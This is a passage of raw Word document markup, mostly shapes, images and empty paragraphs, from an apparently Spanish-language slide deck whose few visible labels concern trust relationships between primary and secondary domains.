                        </wps:spPr>
                        <wps:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:prstTxWarp prst="textNoShape">
                            <a:avLst/>
                          </a:prstTxWarp>
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="250" name="Graphic 250"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="3901438" y="2986932"/>
                            <a:ext cx="2230120" cy="323215"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="l" t="t" r="r" b="b"/>
                            <a:pathLst>
                              <a:path w="2230120" h="323215">
                                <a:moveTo>
                                  <a:pt x="0" y="161544"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="161544" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="161544" y="80772"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2068068" y="80772"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2068068" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2229611" y="161544"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2068068" y="323088"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2068068" y="242316"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="161544" y="242316"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="161544" y="323088"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="161544"/>
                                </a:lnTo>
                                <a:close/>
                              </a:path>
                            </a:pathLst>
                          </a:custGeom>
                          <a:ln w="127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251" name="Image 251"/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId101" cstate="print"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="2415538" y="238271"/>
                            <a:ext cx="5466635" cy="414020"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </wpg:wgp>
                  </a:graphicData>
                </a:graphic>
              </wp:anchor>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:group w14:anchorId="39143893" id="Group 247" o:spid="_x0000_s1026" style="position:absolute;margin-left:79.8pt;margin-top:22.1pt;width:800.4pt;height:516.85pt;z-index:-17951232;mso-wrap-distance-left:0;mso-wrap-distance-right:0;mso-position-horizontal-relative:page;mso-position-vertical-relative:page" coordsize="101650,6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">
                <v:shape id="Image 248" o:spid="_x0000_s1027" type="#_x0000_t75" style="position:absolute;width:101650;height:6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">
                  <v:imagedata r:id="rId102" o:title=""/>
                </v:shape>
                <v:shape id="Graphic 249" o:spid="_x0000_s1028" style="position:absolute;left:39014;top:29869;width:22301;height:3232;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="223012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" path="m2068068,r,80772l161544,80772,161544,,,161544,161544,323088r,-80772l2068068,242316r,80772l2229611,161544,2068068,xe" fillcolor="#e7e6e6" stroked="f">
                  <v:path arrowok="t"/>
                </v:shape>
                <v:shape id="Graphic 250" o:spid="_x0000_s1029" style="position:absolute;left:39014;top:29869;width:22301;height:3232;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="223012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" path="m,161544l161544,r,80772l2068068,80772r,-80772l2229611,161544,2068068,323088r,-80772l161544,242316r,80772l,161544xe" filled="f" strokecolor="red" strokeweight="1pt">
                  <v:path arrowok="t"/>
                </v:shape>
                <v:shape id="Image 251" o:spid="_x0000_s1030" type="#_x0000_t75" style="position:absolute;left:24155;top:2382;width:54666;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">
                  <v:imagedata r:id="rId103" o:title=""/>
                </v:shape>
                <w10:wrap anchorx="page" anchory="page"/>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E5C1980" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6E4B10F9" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="50D7199E" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="66FE914C" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4F18F4B7" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0B70DDBC" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="03F73331" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3D7393A0" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="15F33D24" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2F7D43A7" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="739932A2" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5738704E" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2B393921" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4D5163D4" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="183" w:after="1"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="466FA8BD" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:ind w:left="7607"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:noProof/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4158C22D" wp14:editId="051E15B6">
                <wp:extent cx="2307590" cy="307975"/>
                <wp:effectExtent l="9525" t="0" r="0" b="6350"/>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7590" cy="307975"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:solidFill>
                          <a:srgbClr val="E7E6E6"/>
                        </a:solidFill>
                        <a:ln w="12700">
                          <a:solidFill>
                            <a:srgbClr val="4471C4"/>
                          </a:solidFill>
                          <a:prstDash val="solid"/>
                        </a:ln>
                      </wps:spPr>
                      <wps:txbx>
                        <w:txbxContent>
                          <w:p w14:paraId="537E53C9" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                            <w:pPr>
                              <w:spacing w:before="58"/>
                              <w:ind w:left="758"/>
                              <w:rPr>
                                <w:b/>
                                <w:color w:val="000000"/>
                                <w:sz w:val="28"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:b/>
                                <w:color w:val="000000"/>
                                <w:spacing w:val="-2"/>
                                <w:sz w:val="28"/>
                              </w:rPr>
                              <w:t>Relación de confianza</w:t>
                            </w:r>
                          </w:p>
                        </w:txbxContent>
                      </wps:txbx>
                      <wps:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                        <a:noAutofit/>
                      </wps:bodyPr>
                    </wps:wsp>
                  </a:graphicData>
                </a:graphic>
              </wp:inline>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:shape w14:anchorId="4158C22D" id="Textbox 252" o:spid="_x0000_s1138" type="#_x0000_t202" style="width:181.7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" fillcolor="#e7e6e6" strokecolor="#4471c4" strokeweight="1pt">
                <v:path arrowok="t"/>
                <v:textbox inset="0,0,0,0">
                  <w:txbxContent>
                    <w:p w14:paraId="537E53C9" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                      <w:pPr>
                        <w:spacing w:before="58"/>
                        <w:ind w:left="758"/>
                        <w:rPr>
                          <w:b/>
                          <w:color w:val="000000"/>
                          <w:sz w:val="28"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:b/>
                          <w:color w:val="000000"/>
                          <w:spacing w:val="-2"/>
                          <w:sz w:val="28"/>
                        </w:rPr>
                        <w:t>Relación de confianza</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:anchorlock/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="44A923A4" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="27C92146" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6A0E33F9" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3DECC47A" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3F3A612D" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3DAEC18E" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="744445FD" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7A3E0034" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="379AD07D" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="493D2027" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="490762B7" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3B62EB8F" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5CF3A810" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0A8342DC" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="68A8AB9D" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="29CCA0FF" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2A490CE3" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4F80276C" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="68"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0275349A" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="17491"/>
        </w:tabs>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65</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="656FADAB" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:sectPr w:rsidR="001B199E" w:rsidRPr="007A7B84">
          <w:footerReference w:type="default" r:id="rId104"/>
          <w:pgSz w:w="19200" w:h="10800" w:orient="landscape"/>
          <w:pgMar w:top="440" w:right="0" w:bottom="0" w:left="0" w:header="0" w:footer="0" w:gutter="0"/>
          <w:cols w:space="720"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="08665C08" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="38"/>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65760" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="6E33A707" wp14:editId="4E9BB56C">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>57775</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="page">
                  <wp:posOffset>36285</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="12134850" cy="682180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34850" cy="6821805"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="12134850" cy="6821805"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                        <pic:nvPicPr>
                          <pic:cNvPr id="254" name="Image 254"/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId105" cstate="print"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="12134224" cy="6821714"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                      <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                        <pic:nvPicPr>
                          <pic:cNvPr id="255" name="Image 255"/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId106" cstate="print"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="158632" y="135926"/>
                            <a:ext cx="11759184" cy="6380988"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                      <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                        <pic:nvPicPr>
                          <pic:cNvPr id="256" name="Image 256"/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId107" cstate="print"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="3639322" y="1510574"/>
                            <a:ext cx="1423035" cy="630301"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </wpg:wgp>
                  </a:graphicData>
                </a:graphic>
              </wp:anchor>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:group w14:anchorId="754BC88C" id="Group 253" o:spid="_x0000_s1026" style="position:absolute;margin-left:4.55pt;margin-top:2.85pt;width:955.5pt;height:537.15pt;z-index:-17950720;mso-wrap-distance-left:0;mso-wrap-distance-right:0;mso-position-horizontal-relative:page;mso-position-vertical-relative:page" coordsize="121348,682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">
                <v:shape id="Image 254" o:spid="_x0000_s1027" type="#_x0000_t75" style="position:absolute;width:121342;height:6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">
                  <v:imagedata r:id="rId108" o:title=""/>
                </v:shape>
                <v:shape id="Image 255" o:spid="_x0000_s1028" type="#_x0000_t75" style="position:absolute;left:1586;top:1359;width:117592;height:6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">
                  <v:imagedata r:id="rId109" o:title=""/>
                </v:shape>
                <v:shape id="Image 256" o:spid="_x0000_s1029" type="#_x0000_t75" style="position:absolute;left:36393;top:15105;width:14230;height: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">
                  <v:imagedata r:id="rId110" o:title=""/>
                </v:shape>
                <w10:wrap anchorx="page" anchory="page"/>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="59E56064" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:spacing w:line="235" w:lineRule="auto"/>
        <w:ind w:left="10385" w:right="7770" w:hanging="3"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:b/>
          <w:color w:val="FFFFFF"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Dominio principal</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FAFD317" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="22"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2741EF60" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:spacing w:before="1" w:line="387" w:lineRule="exact"/>
        <w:ind w:left="1115" w:right="14281"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:b/>
          <w:noProof/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="15780352" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="468BD011" wp14:editId="7CBA023A">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>7888223</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>178514</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="3769360" cy="120142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9360" cy="1201420"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:solidFill>
                          <a:srgbClr val="FFFFFF"/>
                        </a:solidFill>
                      </wps:spPr>
                      <wps:txbx>
                        <w:txbxContent>
                          <w:p w14:paraId="1C4067DE" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="001B199E">
                            <w:pPr>
                              <w:pStyle w:val="Textoindependiente"/>
                              <w:spacing w:before="63"/>
                              <w:rPr>
                                <w:color w:val="000000"/>
                              </w:rPr>
                            </w:pPr>
                          </w:p>
                          <w:p w14:paraId="6DDD758E" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                            <w:pPr>
                              <w:pStyle w:val="Textoindependiente"/>
                              <w:spacing w:line="235" w:lineRule="auto"/>
                              <w:ind w:left="2484" w:right="374" w:hanging="2110"/>
                              <w:rPr>
                                <w:color w:val="000000"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:color w:val="000000"/>
                              </w:rPr>
                              <w:t>Confianza entre dominios primarios y secundarios</w:t>
                            </w:r>
                          </w:p>
                        </w:txbxContent>
                      </wps:txbx>
                      <wps:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                        <a:noAutofit/>
                      </wps:bodyPr>
                    </wps:wsp>
                  </a:graphicData>
                </a:graphic>
              </wp:anchor>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
